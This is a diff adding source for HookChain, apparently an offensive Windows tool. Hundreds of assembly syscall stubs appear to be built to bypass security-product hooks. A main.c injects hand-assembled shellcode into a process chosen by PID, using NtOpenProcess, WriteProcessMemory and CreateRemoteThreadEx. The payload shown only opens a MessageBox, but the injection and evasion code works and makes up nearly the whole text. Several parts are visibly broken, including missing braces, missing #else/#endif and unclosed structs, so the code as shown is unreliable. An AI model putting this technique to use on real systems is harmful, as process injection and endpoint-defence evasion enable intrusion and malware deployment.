+ Fnc0180 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0180h
+ ret
+ nop
+ Fnc0180 ENDP
+ Fnc0181 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0181h
+ ret
+ nop
+ Fnc0181 ENDP
+ Fnc0182 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0182h
+ ret
+ nop
+ Fnc0182 ENDP
+ Fnc0183 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0183h
+ ret
+ nop
+ Fnc0183 ENDP
+ Fnc0184 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0184h
+ ret
+ nop
+ Fnc0184 ENDP
+ Fnc0185 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0185h
+ ret
+ nop
+ Fnc0185 ENDP
+ Fnc0186 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0186h
+ ret
+ nop
+ Fnc0186 ENDP
+ Fnc0187 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0187h
+ ret
+ nop
+ Fnc0187 ENDP
+ Fnc0188 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0188h
+ ret
+ nop
+ Fnc0188 ENDP
+ Fnc0189 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0189h
+ ret
+ nop
+ Fnc0189 ENDP
+ Fnc018A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018ah
+ ret
+ nop
+ Fnc018A ENDP
+ Fnc018B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018bh
+ ret
+ nop
+ Fnc018B ENDP
+ Fnc018C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018ch
+ ret
+ nop
+ Fnc018C ENDP
+ Fnc018D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018dh
+ ret
+ nop
+ Fnc018D ENDP
+ Fnc018E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018eh
+ ret
+ nop
+ Fnc018E ENDP
+ Fnc018F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 018fh
+ ret
+ nop
+ Fnc018F ENDP
+ Fnc0190 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0190h
+ ret
+ nop
+ Fnc0190 ENDP
+ Fnc0191 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0191h
+ ret
+ nop
+ Fnc0191 ENDP
+ Fnc0192 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0192h
+ ret
+ nop
+ Fnc0192 ENDP
+ Fnc0193 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0193h
+ ret
+ nop
+ Fnc0193 ENDP
+ Fnc0194 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0194h
+ ret
+ nop
+ Fnc0194 ENDP
+ Fnc0195 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0195h
+ ret
+ nop
+ Fnc0195 ENDP
+ Fnc0196 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0196h
+ ret
+ nop
+ Fnc0196 ENDP
+ Fnc0197 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0197h
+ ret
+ nop
+ Fnc0197 ENDP
+ Fnc0198 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0198h
+ ret
+ nop
+ Fnc0198 ENDP
+ Fnc0199 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0199h
+ ret
+ nop
+ Fnc0199 ENDP
+ Fnc019A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019ah
+ ret
+ nop
+ Fnc019A ENDP
+ Fnc019B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019bh
+ ret
+ nop
+ Fnc019B ENDP
+ Fnc019C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019ch
+ ret
+ nop
+ Fnc019C ENDP
+ Fnc019D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019dh
+ ret
+ nop
+ Fnc019D ENDP
+ Fnc019E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019eh
+ ret
+ nop
+ Fnc019E ENDP
+ Fnc019F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 019fh
+ ret
+ nop
+ Fnc019F ENDP
+ Fnc01A0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a0h
+ ret
+ nop
+ Fnc01A0 ENDP
+ Fnc01A1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a1h
+ ret
+ nop
+ Fnc01A1 ENDP
+ Fnc01A2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a2h
+ ret
+ nop
+ Fnc01A2 ENDP
+ Fnc01A3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a3h
+ ret
+ nop
+ Fnc01A3 ENDP
+ Fnc01A4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a4h
+ ret
+ nop
+ Fnc01A4 ENDP
+ Fnc01A5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a5h
+ ret
+ nop
+ Fnc01A5 ENDP
+ Fnc01A6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a6h
+ ret
+ nop
+ Fnc01A6 ENDP
+ Fnc01A7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a7h
+ ret
+ nop
+ Fnc01A7 ENDP
+ Fnc01A8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a8h
+ ret
+ nop
+ Fnc01A8 ENDP
+ Fnc01A9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01a9h
+ ret
+ nop
+ Fnc01A9 ENDP
+ Fnc01AA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01aah
+ ret
+ nop
+ Fnc01AA ENDP
+ Fnc01AB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01abh
+ ret
+ nop
+ Fnc01AB ENDP
+ Fnc01AC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ach
+ ret
+ nop
+ Fnc01AC ENDP
+ Fnc01AD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01adh
+ ret
+ nop
+ Fnc01AD ENDP
+ Fnc01AE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01aeh
+ ret
+ nop
+ Fnc01AE ENDP
+ Fnc01AF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01afh
+ ret
+ nop
+ Fnc01AF ENDP
+ Fnc01B0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b0h
+ ret
+ nop
+ Fnc01B0 ENDP
+ Fnc01B1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b1h
+ ret
+ nop
+ Fnc01B1 ENDP
+ Fnc01B2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b2h
+ ret
+ nop
+ Fnc01B2 ENDP
+ Fnc01B3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b3h
+ ret
+ nop
+ Fnc01B3 ENDP
+ Fnc01B4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b4h
+ ret
+ nop
+ Fnc01B4 ENDP
+ Fnc01B5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b5h
+ ret
+ nop
+ Fnc01B5 ENDP
+ Fnc01B6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b6h
+ ret
+ nop
+ Fnc01B6 ENDP
+ Fnc01B7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b7h
+ ret
+ nop
+ Fnc01B7 ENDP
+ Fnc01B8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b8h
+ ret
+ nop
+ Fnc01B8 ENDP
+ Fnc01B9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01b9h
+ ret
+ nop
+ Fnc01B9 ENDP
+ Fnc01BA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bah
+ ret
+ nop
+ Fnc01BA ENDP
+ Fnc01BB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bbh
+ ret
+ nop
+ Fnc01BB ENDP
+ Fnc01BC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bch
+ ret
+ nop
+ Fnc01BC ENDP
+ Fnc01BD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bdh
+ ret
+ nop
+ Fnc01BD ENDP
+ Fnc01BE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01beh
+ ret
+ nop
+ Fnc01BE ENDP
+ Fnc01BF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01bfh
+ ret
+ nop
+ Fnc01BF ENDP
+ Fnc01C0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c0h
+ ret
+ nop
+ Fnc01C0 ENDP
+ Fnc01C1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c1h
+ ret
+ nop
+ Fnc01C1 ENDP
+ Fnc01C2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c2h
+ ret
+ nop
+ Fnc01C2 ENDP
+ Fnc01C3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c3h
+ ret
+ nop
+ Fnc01C3 ENDP
+ Fnc01C4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c4h
+ ret
+ nop
+ Fnc01C4 ENDP
+ Fnc01C5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c5h
+ ret
+ nop
+ Fnc01C5 ENDP
+ Fnc01C6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c6h
+ ret
+ nop
+ Fnc01C6 ENDP
+ Fnc01C7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c7h
+ ret
+ nop
+ Fnc01C7 ENDP
+ Fnc01C8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c8h
+ ret
+ nop
+ Fnc01C8 ENDP
+ Fnc01C9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01c9h
+ ret
+ nop
+ Fnc01C9 ENDP
+ Fnc01CA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cah
+ ret
+ nop
+ Fnc01CA ENDP
+ Fnc01CB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cbh
+ ret
+ nop
+ Fnc01CB ENDP
+ Fnc01CC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cch
+ ret
+ nop
+ Fnc01CC ENDP
+ Fnc01CD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cdh
+ ret
+ nop
+ Fnc01CD ENDP
+ Fnc01CE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ceh
+ ret
+ nop
+ Fnc01CE ENDP
+ Fnc01CF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01cfh
+ ret
+ nop
+ Fnc01CF ENDP
+ Fnc01D0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d0h
+ ret
+ nop
+ Fnc01D0 ENDP
+ Fnc01D1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d1h
+ ret
+ nop
+ Fnc01D1 ENDP
+ Fnc01D2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d2h
+ ret
+ nop
+ Fnc01D2 ENDP
+ Fnc01D3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d3h
+ ret
+ nop
+ Fnc01D3 ENDP
+ Fnc01D4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d4h
+ ret
+ nop
+ Fnc01D4 ENDP
+ Fnc01D5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d5h
+ ret
+ nop
+ Fnc01D5 ENDP
+ Fnc01D6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d6h
+ ret
+ nop
+ Fnc01D6 ENDP
+ Fnc01D7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d7h
+ ret
+ nop
+ Fnc01D7 ENDP
+ Fnc01D8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d8h
+ ret
+ nop
+ Fnc01D8 ENDP
+ Fnc01D9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01d9h
+ ret
+ nop
+ Fnc01D9 ENDP
+ Fnc01DA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01dah
+ ret
+ nop
+ Fnc01DA ENDP
+ Fnc01DB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01dbh
+ ret
+ nop
+ Fnc01DB ENDP
+ Fnc01DC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01dch
+ ret
+ nop
+ Fnc01DC ENDP
+ Fnc01DD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ddh
+ ret
+ nop
+ Fnc01DD ENDP
+ Fnc01DE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01deh
+ ret
+ nop
+ Fnc01DE ENDP
+ Fnc01DF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01dfh
+ ret
+ nop
+ Fnc01DF ENDP
+ Fnc01E0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e0h
+ ret
+ nop
+ Fnc01E0 ENDP
+ Fnc01E1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e1h
+ ret
+ nop
+ Fnc01E1 ENDP
+ Fnc01E2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e2h
+ ret
+ nop
+ Fnc01E2 ENDP
+ Fnc01E3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e3h
+ ret
+ nop
+ Fnc01E3 ENDP
+ Fnc01E4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e4h
+ ret
+ nop
+ Fnc01E4 ENDP
+ Fnc01E5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e5h
+ ret
+ nop
+ Fnc01E5 ENDP
+ Fnc01E6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e6h
+ ret
+ nop
+ Fnc01E6 ENDP
+ Fnc01E7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e7h
+ ret
+ nop
+ Fnc01E7 ENDP
+ Fnc01E8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e8h
+ ret
+ nop
+ Fnc01E8 ENDP
+ Fnc01E9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01e9h
+ ret
+ nop
+ Fnc01E9 ENDP
+ Fnc01EA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01eah
+ ret
+ nop
+ Fnc01EA ENDP
+ Fnc01EB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ebh
+ ret
+ nop
+ Fnc01EB ENDP
+ Fnc01EC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ech
+ ret
+ nop
+ Fnc01EC ENDP
+ Fnc01ED PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01edh
+ ret
+ nop
+ Fnc01ED ENDP
+ Fnc01EE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01eeh
+ ret
+ nop
+ Fnc01EE ENDP
+ Fnc01EF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01efh
+ ret
+ nop
+ Fnc01EF ENDP
+ Fnc01F0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f0h
+ ret
+ nop
+ Fnc01F0 ENDP
+ Fnc01F1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f1h
+ ret
+ nop
+ Fnc01F1 ENDP
+ Fnc01F2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f2h
+ ret
+ nop
+ Fnc01F2 ENDP
+ Fnc01F3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f3h
+ ret
+ nop
+ Fnc01F3 ENDP
+ Fnc01F4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f4h
+ ret
+ nop
+ Fnc01F4 ENDP
+ Fnc01F5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f5h
+ ret
+ nop
+ Fnc01F5 ENDP
+ Fnc01F6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f6h
+ ret
+ nop
+ Fnc01F6 ENDP
+ Fnc01F7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f7h
+ ret
+ nop
+ Fnc01F7 ENDP
+ Fnc01F8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f8h
+ ret
+ nop
+ Fnc01F8 ENDP
+ Fnc01F9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01f9h
+ ret
+ nop
+ Fnc01F9 ENDP
+ Fnc01FA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01fah
+ ret
+ nop
+ Fnc01FA ENDP
+ Fnc01FB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01fbh
+ ret
+ nop
+ Fnc01FB ENDP
+ Fnc01FC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01fch
+ ret
+ nop
+ Fnc01FC ENDP
+ Fnc01FD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01fdh
+ ret
+ nop
+ Fnc01FD ENDP
+ Fnc01FE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01feh
+ ret
+ nop
+ Fnc01FE ENDP
+ Fnc01FF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 01ffh
+ ret
+ nop
+ Fnc01FF ENDP
diff --git a/HookChain/HookChain/main.c b/HookChain/HookChain/main.c
new file mode 100644
index 0000000..f7d20c0
--- /dev/null
+++ b/HookChain/HookChain/main.c
@@ -0,0 +1,172 @@
+#pragma once
+#include "hook.h"
+INT wmain(int argc, char* argv[])
+ NTSTATUS status;
+ PVOID shellAddress = NULL;
+ HANDLE hProcess = (HANDLE)-1;
+ DWORD dwPID = 0;
+ if (argc >= 2)
+ {
+ dwPID = _wtoi(argv[1]);
+ if (dwPID == 0)
+ dwPID = atoi(argv[1]);
+ }
+ if (dwPID == 0) {
+ char cPid[7];
+ printf("Type the pid: \n");
+ fgets(cPid, sizeof(cPid), stdin);
+ dwPID = _wtoi(cPid);
+ if (dwPID == 0)
+ dwPID = atoi(cPid);
+ }
+ if (dwPID == 0) {
+ printf("[!] Failed to get PID\n");
+ return 1;
+ }
+ printf("\n[+] Creating HookChain implants\n");
+ if (!InitApi()) {
+ printf("[!] Failed to initialize API\n");
+ return 1;
+ }
+ printf("\n[+] HookChain implanted! \\o/\n\n");
+ printf("[*] Creating Handle onto PID %d\n", dwPID);
+ PCLIENT_ID clientId = (PCLIENT_ID)RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(CLIENT_ID));
+ clientId->UniqueProcess = dwPID;
+ if (!NT_SUCCESS(NtOpenProcess(&hProcess, PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, objectAttributes, clientId))) {
+ printf("[!] Failed to call OP: Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+ printf("[*] Allocating memory at Handle 0x%p\n", hProcess);
+ SIZE_T memSize = 0x1000;
+ if (!NT_SUCCESS(NtAllocateVirtualMemory(hProcess, &shellAddress, 0, &memSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ))) {
+ printf("[!] Failed to call VA(shellAddress): Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+ printf("[*] Injecting remote shellcode\n");
+ //Write Caption and Text to memory address of remote process
+ TCHAR Text[] = TEXT("Message Box created from HookChain");
+ TCHAR Caption[] = TEXT("Process injected MessageBox");
+ FARPROC fpText = (FARPROC)((PBYTE)shellAddress + 0x100);
+ FARPROC fpCaption = (FARPROC)((PBYTE)shellAddress + 0x200);
+ PVOID pText = &fpText;
+ PVOID pCaption = &fpCaption;
+ if (!WriteProcessMemory(hProcess, fpText, (LPCVOID)Text, sizeof(Text), NULL)) {
+ printf("[!] Failed to call WPM(Text): Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+ if (!WriteProcessMemory(hProcess, fpCaption, (LPCVOID)Caption, sizeof(Caption), NULL)) {
+ printf("[!] Failed to call WPM(Caption): Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+#ifdef UNICODE
+ PVOID pfMessageBox = HGetProcAddress2("User32", "MessageBoxW");
+ PVOID pMessageBox = &pfMessageBox;
+ FARPROC pfMessageBox = HGetProcAddress2("User32", "MessageBoxA");
+ PVOID pMessageBox = &pfMessageBox;
+ PVOID fpTerminateThread = HGetProcAddress2("Kernel32", "TerminateThread");
+ PVOID pTerminateThread = &fpTerminateThread;
+ /*
+ int MessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType);
+ uType:
+ MB_OK = 0x00000000L
+ MB_ICONWARNING = 0x00000030L
+ MB_TOPMOST = 0x00040000L
+ MB_SETFOREGROUND = 0x00010000L
+ BOOL TerminateThread(HANDLE hThread, DWORD dwExitCode);
+ */
+ unsigned char p1[] = {
+ //0xcc,
+ 0x55 // push rbp
+ , 0x48, 0x89, 0xe5 // mov rbp,rsp
+ , 0xfc // cld
+ , 0x48, 0x83, 0xe4, 0xf0 // and rsp, 0xfffffffffffffff0
+ , 0x48, 0x31, 0xc0 // xor rax,rax
+ , 0x48, 0x89, 0xc1 // mov rcx,rax
+ , 0x48, 0xba,*((PBYTE)pText),*((PBYTE)pText + 1),*((PBYTE)pText + 2),*((PBYTE)pText + 3),*((PBYTE)pText + 4),*((PBYTE)pText + 5),*((PBYTE)pText + 6),*((PBYTE)pText + 7) // mov rdx, ...
+ , 0x49, 0xb8,*((PBYTE)pCaption),*((PBYTE)pCaption + 1),*((PBYTE)pCaption + 2),*((PBYTE)pCaption + 3),*((PBYTE)pCaption + 4),*((PBYTE)pCaption + 5),*((PBYTE)pCaption + 6),*((PBYTE)pCaption + 7) // mov r8, ...
+ , 0x41, 0xb9, 0x30, 0x00, 0x05, 0x00 // mov r9,0x30 => MB_OK | MB_ICONWARNING | MB_TOPMOST | MB_SETFOREGROUND
+ , 0x48, 0x83, 0xec, 0x20 // sub rsp,0x20
+ , 0x48, 0x89, 0x04, 0x24 // mov QWORD PTR [rsp],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x08 // mov QWORD PTR [rsp+0x8],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x10 // mov QWORD PTR [rsp+0x10],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x18 // mov QWORD PTR [rsp+0x18],rax
+ , 0x48, 0xb8,*((PBYTE)pMessageBox),*((PBYTE)pMessageBox + 1),*((PBYTE)pMessageBox + 2),*((PBYTE)pMessageBox + 3),*((PBYTE)pMessageBox + 4),*((PBYTE)pMessageBox + 5),*((PBYTE)pMessageBox + 6),*((PBYTE)pMessageBox + 7) // mov rax ...
+ , 0xff, 0xd0 // call rax
+ , 0x48, 0x31, 0xc0 // xor rax,rax
+ , 0x48, 0x89, 0xc1 // mov rcx,rax
+ , 0x48, 0xff, 0xc9 // dec rcx
+ , 0x48, 0x89, 0xc2 // mov rdx,rax
+ , 0x48, 0x83, 0xec, 0x20 // sub rsp,0x20
+ , 0x48, 0x89, 0x04, 0x24 // mov QWORD PTR [rsp],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x08 // mov QWORD PTR [rsp+0x8],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x10 // mov QWORD PTR [rsp+0x10],rax
+ , 0x48, 0x89, 0x44, 0x24, 0x18 // mov QWORD PTR [rsp+0x18],rax
+ , 0x48, 0xb8,*((PBYTE)pTerminateThread),*((PBYTE)pTerminateThread + 1),*((PBYTE)pTerminateThread + 2),*((PBYTE)pTerminateThread + 3),*((PBYTE)pTerminateThread + 4),*((PBYTE)pTerminateThread + 5),*((PBYTE)pTerminateThread + 6),*((PBYTE)pTerminateThread + 7) // mov rax ...
+ , 0xff, 0xd0 // call rax
+ , 0x48, 0x89, 0xec // mov rsp,rbp
+ , 0x5d // pop rbp
+ , 0xc3 // ret
+ , 0xcc, 0xcc, 0xcc // INT3
+ };
+ if (!WriteProcessMemory(hProcess, shellAddress, (LPCVOID)p1, sizeof(p1), NULL)) {
+ printf("[!] Failed to call WriteProcessMemory(Shellcode): Status = 0x%08lx\n", GetLastError());
+ }
+ printf("[*] Calling CreateRemoteThreadEx\n");
+ HANDLE hThread = CreateRemoteThreadEx(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)shellAddress, NULL, NULL, NULL, NULL);
+ if (hThread == NULL) {
+ printf("[!] Failed to call CRT: Status = 0x%08lx\n", GetLastError());
+ return 1;
+ }
+ //Disable Hook prints
+ SetDebug(FALSE);
+ printf("[+] Shellcode OK!\n");
+ printf("\n\n _ _ _____ _____ _ _ _______ _ _ _______ _____ __ _\n |_____| | | | | |____/ | |_____| |_____| | | \\ |\n | | |_____| |_____| | \\_ |_____ | | | | __|__ | \\_|\n By M4v3r1ck\n\n");
+ return 0x00;
diff --git a/HookChain/HookChain/windows_common.h b/HookChain/HookChain/windows_common.h
new file mode 100644
index 0000000..da37ff7
--- /dev/null
+++ b/HookChain/HookChain/windows_common.h
@@ -0,0 +1,393 @@
+#define WIN32_LEAN_AND_MEAN
+#if defined _M_X64
+#define WIN_X64
+#elif defined _M_IX86
+#define WIN_X86
+#define DEREF( name )*(UINT_PTR *)(name)
+#define DEREF_64( name )*(DWORD64 *)(name)
+#define DEREF_32( name )*(DWORD *)(name)
+#define DEREF_16( name )*(WORD *)(name)
+#define DEREF_8( name )*(BYTE *)(name)
+#define DLLEXPORT __declspec( dllexport )
+#define NT_SUCCESS(x) ((x) == 0)
+#define RVA2OFFSET(Type, DllBase, CpBase, CpVa, Rva) (Type)((ULONG_PTR)CpBase + (((ULONG_PTR)DllBase + Rva) - (ULONG_PTR)CpVa))
+#define OFFSET2RVA(DllBase, CpBase, CpVa, OffsetVa) (DWORD)( (DWORD_PTR)CpVa + ((DWORD_PTR)OffsetVa - (DWORD_PTR)CpBase) - (DWORD_PTR)DllBase )
+#define RVA2RAW(Type, DllBase, SectionRva, SectionPointerToRawData, Rva) (Type)((ULONG_PTR)DllBase + ((ULONG_PTR)Rva - (ULONG_PTR)SectionRva) + (ULONG_PTR)SectionPointerToRawData)
+typedef struct _LSA_UNICODE_STRING {
+ USHORT Length;
+ USHORT MaximumLength;
+ PWSTR Buffer;
+typedef struct _LDR_MODULE {
+ LIST_ENTRY InLoadOrderModuleList;
+ LIST_ENTRY InMemoryOrderModuleList;
+ LIST_ENTRY InInitializationOrderModuleList;
+ PVOID BaseAddress;
+ PVOID EntryPoint;
+ ULONG SizeOfImage;
+ ULONG Flags;
+ SHORT LoadCount;
+ SHORT TlsIndex;
+ LIST_ENTRY HashTableEntry;
+ ULONG TimeDateStamp;
+typedef struct _PEB_LDR_DATA {
+ ULONG Length;
+ ULONG Initialized;
+ PVOID SsHandle;
+ LIST_ENTRY InLoadOrderModuleList;
+ LIST_ENTRY InMemoryOrderModuleList;
+ LIST_ENTRY InInitializationOrderModuleList;
+typedef struct _PEB {
+ BOOLEAN InheritedAddressSpace;
+ BOOLEAN ReadImageFileExecOptions;
+ BOOLEAN BeingDebugged;
+ BOOLEAN Spare;
+ HANDLE Mutant;
+ PVOID ImageBase;
+ PPEB_LDR_DATA LoaderData;
+ PVOID ProcessParameters;
+ PVOID SubSystemData;
+ PVOID ProcessHeap;
+ PVOID FastPebLock;
+ PVOID FastPebLockRoutine;
+ PVOID FastPebUnlockRoutine;
+ ULONG EnvironmentUpdateCount;
+ PVOID* KernelCallbackTable;
+ PVOID EventLogSection;
+ PVOID EventLog;
+ PVOID FreeList;
+ ULONG TlsExpansionCounter;
+ PVOID TlsBitmap;
+ ULONG TlsBitmapBits[0x2];
+ PVOID ReadOnlySharedMemoryBase;
+ PVOID ReadOnlySharedMemoryHeap;
+ PVOID* ReadOnlyStaticServerData;
+ PVOID AnsiCodePageData;
+ PVOID OemCodePageData;
+ PVOID UnicodeCaseTableData;
+ ULONG NumberOfProcessors;
+ ULONG NtGlobalFlag;
+ BYTE Spare2[0x4];
+ LARGE_INTEGER CriticalSectionTimeout;
+ ULONG HeapSegmentReserve;
+ ULONG HeapSegmentCommit;
+ ULONG HeapDeCommitTotalFreeThreshold;
+ ULONG HeapDeCommitFreeBlockThreshold;
+ ULONG NumberOfHeaps;
+ ULONG MaximumNumberOfHeaps;
+ PVOID** ProcessHeaps;
+ PVOID GdiSharedHandleTable;
+ PVOID ProcessStarterHelper;
+ PVOID GdiDCAttributeList;
+ PVOID LoaderLock;
+ ULONG OSMajorVersion;
+ ULONG OSMinorVersion;
+ ULONG OSBuildNumber;
+ ULONG OSPlatformId;
+ ULONG ImageSubSystem;
+ ULONG ImageSubSystemMajorVersion;
+ ULONG ImageSubSystemMinorVersion;
+ ULONG GdiHandleBuffer[0x22];
+ ULONG PostProcessInitRoutine;
+ ULONG TlsExpansionBitmap;
+ BYTE TlsExpansionBitmapBits[0x80];
+ ULONG SessionId;
+} PEB, * PPEB;
+typedef struct __CLIENT_ID {
+ HANDLE UniqueProcess;
+ HANDLE UniqueThread;
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
+ ULONG Flags;
+ PCHAR FrameName;
+typedef struct _TEB_ACTIVE_FRAME {
+ ULONG Flags;
+ struct _TEB_ACTIVE_FRAME* Previous;
